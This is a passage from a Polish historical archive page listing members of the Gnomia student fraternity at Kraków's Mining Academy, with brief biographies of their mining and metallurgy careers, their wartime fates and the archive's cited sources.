 94. Stanisław Piekarczyk, (15 listopada 1906 w Zawierciu - prawd. po 1979) absolwent Gimnazjum w Częstochowie, student i absolwent Wydziału Górniczego AG 1927-33, akt. 192?-31, pracownik kopalni rudy żelaza “Bernard” i “Paweł” w Gnaszynie 1933-37, kopalni “Florentyna” w Łagiewnikach 1937, kopalni rudy żelaza “Żarki” 1939-45, po wojnie naczelny inż. Zjednoczenia Kopalń Rudy Żelaza w Częstochowie 1945-53, dyrektor Biura Projektów Kopalń Rudy Żelaza w Częstochowie 1953-54, kierownik Oddziału Rud Głównego Instytutu Górniczego w Częstochowie 1954-56, kierownik sekcji w Zespole Planów Perspektywistycznych Komisji Planowania Gospodarczego przy Radzie Ministrów 1956-62, kierownik Zespołu Zasobów Naturalnych Komitetu Nauki i Techniki w Warszawie 1962-72, od 1972 na emeryturze
 95. Tadeusz Pieprzak-Czajkowski, student AG, student i absolwent WSH, założyciel Gnomii, akt. 1923-31, wiceprezes 1928
 96. Czesław Piotrowicz, student AG, akt. 1930-31, skreślony z Korporacji
 97. Eryk Porąbka, (16 września 1914 w Marklowicach - 10 czerwca 1998) s. Jana, absolwent Gimnazjum im. Mikołaja Kopernika, student i absolwent Wydziału Górniczego AG 1934-46, c. 1934, dyrektor kopalni “Bytom” 1945-55, naczelny dyrektor Gliwickiego 1955-57 oraz Zabrzańskiego 1957-64 Zjednoczenia Przemysłu Węglowego, podsekretarz stanu w Ministerstwie Górnictwa i Energetyki w Katowicach 1964-74, prezes Wojewódzkiego Urzędu Górniczego w Katowicach 1974-76
 98. Kazimierz Pstrokoński, (22 listopada 1900 w Mące - 11 stycznia 1964 w Sosnowcu), absolwent Gimnazjum w Kaliszu, student Wydziału Górniczego AG 1921-30, założyciel Gnomii, po studiach pracownik m.in. kopalnia “Saturn” w Czeladzi, kopalni “Kazimierz” w Kazimierzu Górniczym, kopalni “Matylka” w Lipinach Śląskich, uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagach 1939-45, dyrektor kopalni “Jowisz” 1945-46, kierownik wydziału ruchu Dąbrowskiego Zjednoczenia Przemysłu Węglowego 1946-49, dyrektor kopalni “Czeladź” w Czeladzi 1949-50, inspektor kopalń Dąbrowskiego Zjednoczenia Przemysłu Węglowego 1950-64
 99. Roman Rössler, (11 sierpnia 1903 w Rawie Ruskiej - prawd. po 1979) s. Tomasza, absolwent II Gimnazjum im. K. Morawskiego w Przemyślu, student i absolwent Wydziału Górniczego AG 1922-34, c. 1925, akt. 1925-31, po studiach pracował m.in.. W kopalni “Polska’ w Świętochłowicach, kopalni “Kazimierz-Juliusz” w Kazimierzu Górniczym, kierownik odbudowy Zakładu Zdrojowego Gorzałkowice Zdrój 1945-47, inspektor, naczelnik wydziału, p.o. dyrektora departamentu Wojewódzkiego Urzędu Górniczego w Katowicach 1947-55, generalny projektant w Biurze Projektów Górniczych w Gliwicach 1955-71, od 1972 na emeryturze

  Witold Rosnowski, prawd. ok. 1930 r.

 100. Witold Rosnowski, (8 listopada 1905 w Dąbrowie Górniczej - 1 grudnia 1947 w Kowarach) s. Zenona i Felicji z d. Ciechowska, absolwent Gimnazjum im. Stanisława Staszica w Sosnowcu, student i absolwent Wydziału Górniczego AG 1923-30, c. 1925, olderman 1928, po studiach pracownik m.in. kopalni “Prezydent” w Królewskiej Hucie, “Knurów” w Knurowie, “Dorota” w Ostrowach Górniczych, pracownik umysłowy firmy “Torf” w Zagłębiu, inspektor kopalń i zastępca dyrektora w Bytomskim Zjednoczeniu Przemysłu Węglowego 1945-47, pochowany na Cmentarzu w Mysłowicach

 101. Tadeusz Rutowski, (17 lipca 1906 w Głogowie - kwiecień 1969 w Warszawie) absolwent II Gimnazjum w Krakowie, student i absolwent Wydziału Górniczego AG 1925-30, akt. lata 20-te, po wojnie kierownik robót górniczych w kopalni “Radzionków” 1932-39, inż. ruchu w Kamieniołomie Porfiru w Miękini 1939-45, dyrektor kopalni “Centrum” w Bytomiu, główny inż. w Bytomskim Zjednoczeniu Przemysłu Węglowego 1947-52, rzeczoznawca górniczy 1952-55 i wicedyrektor i kierownik biura ekspertów 1955-69 w Głównej Komisji Oceny Projektów Inwestycyjnych PKPG w Warszawie
 102. Marian Rychter, (6 września 1908 w Karolinowie - prawd. po 1979) absolwent Gimnazjum w Tomaszowie Mazowieckim, student i absolwent Wydziału Górniczego AG 1926-34, akt. 1928-31, sekretarz sem. zim. 1928/29, prezes sem. zim. 1930/31, po studiach pracownik kopalni “Wieliczka” 1934-37 oraz kopalni “Andaluzja” w Brzezinach Śląskich 1937-39, uczestnik wojny obronnej 1939, w PSZ na Zachodzie (m.in. Tobruk i Monte Cassino), ranny, po wojnie przedstawiciel firmy zajmującej się budową tuneli i przekopów w Londynie 1947-71, od 1972 na emeryturze
 103. Alfred Ryszka (Ryżka), (15 czerwca 1909 w Krakowie - 6 lipca 1960 w Knurowie) s. Franciszka, absolwent Gimnazjum Matematyczno-Przyrodniczego w Cieszynie, student i absolwent Wydziału Górniczego AG 1929-38, c. 1930, akt. 1930-31, po studiach pracował w kopalniach “Polska” w Świętochłowicach oraz “Silesia” w Czechowicach 1938-39, uczestnik wojny obronnej 1939, w niewoli niemieckiej w oflagach 1939-45, po wojnie m.in. w kopalniach “Mysłowice” w Mysłowicach, “Pstrowski” w Zabrzu, “Mikulczyce” w Mikulczycach, “Rokitinica” w Rokitnicy, “Zabrze” w Zabrzu, dyrektor kopalni “Knurów” w Knurowie 1958-60
 104. Służewski, założyciel Gnomii
 105. Edward Snarski, c. 1938, akt. 1938-39

  Zygmunt Sojecki, 1925 r.

 106. Zygmunt Sojecki, (7 września 1899 w Jekaterynosławiu na Ukrainie - 16 lipca 1971 w Katowicach) s. Michała i Anny z d. Antonowicz, absolwent Szkoły Realnej w Odessie, żołnierz wojny 1919-1920, student i absolwent Wydziału Hutniczego AG, założyciel Gnomii, prezes Gnomii, po studiach pracownik m.in. Huty “Kunegunda” w Bogucicach, Huty “Łazarza” w Radzionkowie Rojcy, Huty “Silesia” w Lipinach Śląskich, dyrektor Huty “Silesia” 1945-48, w 1948 usunięty ze stanowiska z powodów politycznych, inspektor planowania w Centralnym Zarządzie Przemysłu Metali Nieżelaznych w Katowicach, starszy inż. w Departamencie Planowania w Ministerstwie Hutnictwa 1952-53, kierownik działu planowania w Zjednoczeniu Górniczo-Hutniczym Metali Nieżelaznych 1955-59, starszy inż. ds. RWPG 1959-68, odznaczony m.in. Krzyżem Kawalerskim OOP, dwukrotnie Złotym Krzyżem Zasługi, złotą odznaką NOT, honorowy członek Stowarzyszenia Inżynierów i Techników Przemysłu Hutniczego

 107. Józef Sokołowski, (10 listopada 1905 w Kijowie - luty 1979 w Rybniku) s. Mariana, absolwent Gimnazjum w Zawierciu, student i absolwent Wydziału Górniczego AG 1926-37, akt. 1927-29 (?) w Praetorii, wiceprezes 1928, prawd. wystąpił z Preatorii i wstąpił do Gnomii, akt. 1930-32 w Gnomii, olderman sem. zim. 1931/32 (od października), filister 1938/39, po studiach pracownik m.in. kopalni “Paweł” w Chebzie oraz kopalni “Jankowice” w Boguszowicach 1937-39, po wojnie kierownik robót górniczych kopalni “Anna” w Pszowie 1946-48 oraz “Ignacy” w Niewiadomej 1948-49, pracownik kopalni “Rydułtowy”, “Ludwik”, dyrektor kopalni “Pstrowski” w Zabrzu 1954, dyrektor departamentu w Wojewódzkim Urzędzie Górniczym w Katowicach 1955-71, od 1971 na emeryturze
 108. Bronisław Marian Stasicki, (11 stycznia 1899 w Krakowie - 4 czerwca 1956 w Katowicach) s. Tadeusza, absolwent III Gimnazjum J. Sobieskiego w Krakowie, student Wydziału Górniczego AG 1920-27, założyciel Gnomii, po studiach pracownik m.in. kopalni “Biały Szarlej” w Brzezinach Śląskich, motorowy w Krakowskich Miejskich Kolejach Energetycznych 1940-45, dyrektor kopalni “Nowy Orzeł” 1945 oraz “Orzeł Biały” w Brzezinach Śląskich 1946-49, główny projektant Biura Projektów Przemysłu Metali Nieżelaznych “Bipromet” w Katowicach 1950-56
 109. Alojzy Stempel, student AG 1923-26, akt. ok. 1925, wystąpił z Korporacji
 110. Tadeusz Stoch, (22 września 1899 w Krakowie - 1 sierpnia 1941 w Auschwitz) absolwent IV Gimnazjum im. H. Sienkiewicza w Krakowie, w czasie I wojny światowej w armii austriackiej na froncie włoskim 1917/18, uczestnik wojny polsko-bolszewickiej 1920, student i absolwent Wydziału Górniczego AG 1921-28, założyciel Gnomii, po studiach pracownik kopalni “Paryż” w Dąbrowie Górniczej, aresztowany przez Gestapo w 1941, osadzony w obozie koncentracyjnym w Auschwitz, tam zamordowany

  Stanisław Stopa, lata 30-te.

 111. Stanisław Stopa, (10 sierpnia 1914 w Nowym Sączu -1997) absolwent Gimnazjum Klasycznego w Bydgoszczy, student i absolwent Wydziału Górniczego 1931-45, akt. 1935-39, od 1945 wykładowca AG, doktorat 1951, docent 1954, prof. nadzw. 1963, kierownik Zakładu Geologii Złóż Węgli AG 1953-59, kierownik Katedry Złóż Węgli 1959-69, od 1969 kierownik Zakładu Złóż Węgla Kamiennego, prodziekan Wydziału Geologiczno-Poszukiwawczego 1958-60 oraz 1962-64, prof. zw. 1974

  Benon Stranz, 2006 r.

 112. Benon Stranz, (30 sierpnia 1918 w Drensteinfurt - 18 marca 2011) absolwent Gimnazjum im. Bolesława Chrobrego w Gnieźnie, student i absolwent Wydziału Górniczego AG 1937-48, c. 1938, akt. 1938-39, po wojnie m.in. naczelny inż. kopalni “Czeladź” w Czeladzi 1948-50, dyrektor kopalni ‘Klimontów” 1951-54, dyrektor kopalni “Sosnowiec” w Sosnowcu 1954-56, dyrektor techniczny 1956-58 oraz naczelny dyrektor 1958-72 Katowickiego Zjednoczenia Przemysłu Węglowego, dyrektor naczelny Głównego Instytutu Górnictwa w Katowicach 1971-74, doktorat PŚ 1966, dr hab. 1976, podsekretarz stanu w Ministerstwie Górnictwa 1974-78, przewodniczący Państwowej Rady Górnictwa w Warszawie 1978-88, przewodniczący Komitetu Organizacyjnego Światowych Kongresów Górniczych 1976-88, członek PZPR (1957-87), odznaczony m.in. Krzyżem Kawalerskim, Oficerskim, Komandorskim i Komandorskim z Gwiazdą, członek honorowy Stowarzyszenia Inżynierów i Techników Górnictwa, Stowarzyszenia Inżynierów Górniczych i Hutniczych Wielkiej Brytanii, Stowarzyszenie Inżynierów Górniczych Płn. Włoch, Międzynarodowego Komitetu Organizacyjnego Światowych Kongresów Górniczych, był członkiem Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich (od 2009 Stowarzyszenia Filistrów Korporacji Akademickich), w 2006 został z Nim przeprowadzony wywiad w ramach akcji Ostatni Filistrzy, pochowany w rodzinnym Witkowie k. Gniezna

 113. Kazimierz Strączyński, student AG 1926-30, później student UW, akt. 1930-31
 114. Artur Zdzisław Strzetelski, student AG 1927-30, później student i absolwent WSH 1930-?, akt. 1930-31, w 1938 w Krakowie
 115. Jan Studniarski, (21 marca 1876 w Szamotułach - 25 stycznia 1946 w Krakowie) s. Feliksa, absolwent Gimnazjum Marii Magdaleny w Poznaniu, student politechnik w Stuttgarcie, Berlinie, Hanowerze, dyplom 1902 doktorat 1905 Politechnika w Hanowerze, po studiach m.in. docent w Wojskowej Akademii Technicznej 1907-09, kierownik Kolei Elektrycznej w Tarnowie 1912-14, II prezydent Poznania 1919, prof. zw. i kierownik Katedry Elektrotechniki AG 1920-39, dziekan Wydziału Hutniczego 1921-22, rektor 1922-24, prorektor 1924-26, aresztowany 1939, obóz koncentracyjny w Sachsenhausen 1939-40, prof. AG 1945-46
 116. Stanisław Sulima, student AG 1936-38
 117. Karol Szastok, student AG, c. 1938, akt. 1938-39
 118. Ryszard Śmietański, (22 września 1909 w Krakowie - prawd. po 1979) s. Leona, absolwent IX Gimnazjum Matematyczno-Przyrodniczego H. Wrońskiego w Krakowie, student i absolwent Wydziału Górniczego AG 1928-48, c. 1930, akt. 1930-39, współpracownik Oddziału Karpaty Instytutu Geologii w Krakowie 1937-39 i 1945-48, kierownik techniczny Amt für Bodenforschung w Krakowie 1939-45, inspektor techniczny w Centralnym Zarządzie Przemysłu Naftowego w Krakowie 1948-53, przewodniczący komisji egzaminacyjnej Izby Rzemieślniczej w Krakowie 1955-61, nauczyciel w Technikum Górniczym 1965-67, od 1967 starszy referent w Przedsiębiorstwie Poszukiwań Naftowych

  Bolesław Świętochowski.

 119. Bolesław Karol Świętochowski, (14 sierpnia 1911 w Porębie Dzierżna - 6 kwietnia 1949 w Krakowie) s. Ignacego i Marii z d. Goebel, absolwent Gimnazjum Ziemi Mazowieckiej w Warszawie, student i absolwent Wydziału Górniczego 1930-39, c. 1930, akt. 1930-39, po studiach pracownik kopalni “Wanda-Lech” w Nowym Bytomiu, asystent AG 1934-39, ppor. rez. art., w wojnie obronnej 1939 w 5 Pułku Artylerii Ciężkiej w 5 Dywzji Pancernej, wzięty do niewoli niemieckiej pod Sandomierzem, więzień oflagu w Murnau, po wyzwoleniu w II Korpusie PSZ na Zachodzie 1945, wrócił do kraju w 1947, asystent AG 1948-49

 120. Paweł Tomaszewicz, (28 stycznia 1900 w Folwarku Staskim w Rosji - 16 września 1944 w Warszawie) absolwent Gimnazjum im. T. Kościuszki, student i absolwent Wydziału Hutniczego AG 1922-35, c. 1924, akt. 1924-31, inspektor Izby Kontroli Państwa w Krakowie 1930-35, szef odlewni i walcowni drutu “S.A. Wielkich Pieców i Zakładów Ostrowieckich” w Ostrowcu Świętokrzyskim 1935-38, szef odlewni Huty “Poręba” w Porębie k. Zawiercia 1938-39, radca departamentu uzbrojenia w Ministerstwie Spraw Wojskowych w Warszawie 1939, konstruktor firmy Bracia Geisler, Okolski, Patschke w Warszawie 1939-41, kierownik techniczny i handlowo-administracyjny Zakładu Galwano-Technicznego w Warszawie 1941-43, kierownik techniczny firma Otto Thuemler w Warszawie 1943-44, w konspiracji w AK, poległ w powstaniu warszawskim, pochowany na rogu ul. Lwowskiej i ul. Koszykowej
 121. Janusz Antoni Tuchołka, (4 czerwca 1917 w Poznaniu - prawd. po 1979) s. Władysława, absolwent Gimnazjum Bergera w Poznaniu, student i absolwent Wydziału Hutniczego AG 1937-47, c. 1938, akt. 1938-39, w czasie wojny obronnej 1939 dowódca plutonu, w czasie wojny m.in. księgowy w Grundstückgesellschaft 1941-44, po wojnie inż. metalurg w Dolnośląskich Zakładach Metalurgicznych w Nowej Soli 1946-67, kierownik zakładu w Dolnośląskich Zakładach Metalrugicznych w Szprotawie 1947-49, kierownik działu topienia, główny metalurg, kierownik stalowni oraz odlewni żeliwa Zakładów Metalurgicznych “Pomet” w Poznaniu 1950-63, główny odlewnik oraz zastępca dyrektora ds. inwestycji Odlewni Żeliwa w Śremie (H. Cegielski) 1963-68
 122. Janusz Julian Tuleja, (10 sierpnia 1908 w Sądowej Wiszni - lata 80-te) s. Ludwika, absolwent Gimnazjum Humanistycznego w Jaworowie, student i absolwent Wydziału Górniczego AG 1926-45, akt. lata 20-te, wystąpił z Korporacji, uczestnik wojny obronnej 1939, uciekł z niewoli, urzędnik w Instytucie Technicznym w Krakowie 1939-45, po wojnie pracował m.in. w kopalni “Centrum” w Bytomiu, “Łagiewniki” w Łagiewnikach Śląskich, kierownik robót górniczych w kopalni “Chorzów” w Chorzowie 1947-50, inspektor kopalń Bytomskiego Zjednoczenia Przemysłu Węglowego 1950-69, główny inż. ds. postępu technicznego w kopalni “Szombierki” w Bytomiu 1969-70, od 1971 na emeryturze
 123. Jan Twardowski, (10 września 1912 w Kielcach - 1941 ?) absolwent Gimnazjum w Warszawie, student i absolwent Wydziału Górniczego AG 1930-39, c. 1930, akt. 1930-31, skreślony z Korporacji, inż. ruchu kopalni ropy naftowej koncernu “Małopolska” w Bitkowie, zamordowany przez Ukraińców
 124. Kazimierz Tymiński, (3 marca 1915 w Gaya-Kyjowie - 1989) s. Franciszka, absolwent Gimnazjum Koedukacyjnego w Kamionce Strumiłowej, student i absolwent Wydziału Górniczego AG 1933-47, ochotnik w 3 Pułku Strzelców Podhalańskich w wojnie obronnej 1939, w konspiracji w tajnej organizacji KOP w Krakowie, uwięziony w 1941-42 na Montelupich w Krakowie, w obozach koncentracyjnych w Auschwitz, Buchenwaldzie 1942-45, po wojnie w kopalniach “Chwałowice” w Chwałowicach, “Jankowice” w Boguszowicach”, kierownik robót górniczych i naczelny inż. w kopalni “Siemianowice” w Siemianowicach Śląskich 1948-53, dyrektor kopalni “Mysłowice” w Mysłowicach 1953-59, kopalni “Katowice” w Katowicach 1959-63, dyrektor kopalni “Siemianowicach” w Siemianowicach Śląskich 1963-69, naczelny inż. Bytomskiego Zjednoczenia Przemysłu Węglowego 1969-70, od 1966 starszy wykładowca PŚ, od 1970 na emeryturze
 125. Edward Wacławik, (10 marca 1917 w Górnej Suchej w Czechach - prawd. po 1979) s. Jana, absolwent Gimnazjum Realnego w Boguminie, student i absolwent Wydziału Hutniczego AG 1937-48, c. 1938, akt. 1938-39, więzień obozów koncentracyjnych w Dachau i Mauthausen-Gusen 1943-45, c. 1938, po wojnie pracownik Huty “Kościuszko” w Chorzowie 1948-49, kierownik ruchu walcowni i kierownik działu perspektywicznego rozwoju Huty “Trzyniec” 1949-77, od 1977 na emeryturze
 126. Czesław Walczyński, student AG, c. 1930, akt. 1930-31, później wstąpił do służby stałej WP, skreślony z Korporacji
 127. Tadeusz Wojnarski, student AG 1923-30, c. 1925, akt. 1925-39, sekretarz 1928
 128. Wiesław Wróblewski, (30 sierpnia 1911 w Sosnowcu - po 1953) s. Antoniego, absolwent Gimnazjum im. S. Wyspiańskiego w Sosnowcu 1930, student i absolwent Wydziału Hutniczego AG 1930-39, c. 1931 Capitolia, akt. 1931, akt. 1938-39 Gnomia, po studiach pracownik m.in. Huty “Częstochowa” w Częstochowie, kopalni “Niwka” w Niwce, kierownik walcowni bruzdowej, młotowni, prasowni i ciągarni w Hucie “Batory” w Chorzowie 1945-50, główny technolog Huty im. Świerczewskiego w Zawadzkim 1951, główny branżowiec kuźnictwa w Ministerstwie Hutnictwa 1952, od 1953 starszy technolog walcowni i wydziału kształtowników ciągłych w Hucie im. Lenina

  Bolesław Zacharzewski, 1938 r.

 129. Bolesław Zacharzewski, (20 czerwca 1918 w Charkowie - 12 grudnia 2006 w Katowicach) s. Tadeusza, absolwent Gimnazjum Bolesława Chrobrego w Piotrkowie Trybunalskim, student i absolwent Wydziału Hutniczego AG 1937-47, c. 1938, akt. 1938-39, urzędnik techniczny Huty Szkła “Hortensja” w Piotrkowie Trybunalskim 1941-44, kierownik wydziału metalurgii proszków Huty “Baildon” w Katowicach 1947-59

 130. Jan Maria Antoni Zaleski, (28 grudnia 1903 w Warszawie - grudzień 1942 w Auschwitz) absolwent Gimnazjum A. Mickiewicza w Warszawie, student i absolwent Wydziału Górniczego AG 1921-31, założyciel Gnomii, po studiach pracownik m.in. kopalni “Juliusz” w Kazimierzu 1929-38, zastępca kierownika ruchu w kopalni “Kleofas”, fabryki Wyrobów Metalowych “Lajtner” w miejsc. Ostrowy 1939-40, aresztowany i zesłany do obozu koncentracyjnego w Auschwitz, tam zamordowany
 131. Zbigniew Zaremba, student AG 1923- , akt. ok. 1926, wystąpił
 132. Józef Wojciech Zawadzki, ( - 1927) student AG 1922-27, założyciel Gnomii, akt. 1923-27, wiceprzewodniczący Krakowskiego Koła Międzykorporacyjnego 1924/25
 133. Władysław Zawadzki, student w Rosji (prawd. w Moskwie lub Petersburgu), żołnierz WP 1918-20, por. artylerii konnej, m.in. wykoleił bolszewicki pociąg pancerny, odznaczony Virtuti Militari i Krzyżem Walecznych, student i absolwent AG, założyciel Gnomii, akt. 1923-31, w 1938 w Roztokach k. Jasła
 134. Andrzej Zdanowski, student AG 1930-31, c. 1930, akt. 1930-39, w 1939 w Miechowie
 135. Witold Żabicki, ( - ok. 2000) c. 1930 (?), akt. 1930-39, wielokrotny olderman, w tym sem. zim. 1930/31
 136. Władysław Żeleski, (15 października 1905 w Strzyżowie - 1940 w Katyniu) s. Zygmunta i Anieli z Czaykowskich, brat Stanisława i Franciszka (Leopolia), w 1920 żołnierz 240 Pułku Piechoty, absolwent Gimnazjum Stefana Batorego we Lwowie, student i absolwent Wydziału Górniczego AG 1923-30, c. 1925, po studiach pracownik firmy górniczo-budowlanej “Walter” w Katowicach, kierownik i współwłaściciel firmy budowlano-górniczej “Olszak i Żeleski” w Katowicach, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1931, pchor. rez., przydzielony do 5 Dywizjonu Artylerii Przeciwlotniczej, w sowieckiej niewoli, zamordowany przez NKWD

Pieczęć Gnomii, 1931 r.

Listę członków opracowano na podstawie:

1) “Gnomia” Korporacja Studentów Akademii Górniczej, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, s. 9 i n.,
2) Gnomia Korporacja Studentów Akademii Górniczej, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 8 i n.,
3) Julian Sulima-Samujłło, Księga wychowanków i wychowawców Akademii Górniczej w Krakowie 1919-1949, Kraków 1979,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Gnomia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostania zmiana: 14 I 2021 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studnetów Akademii Górniczej Gnomia (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 14 I 2021 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }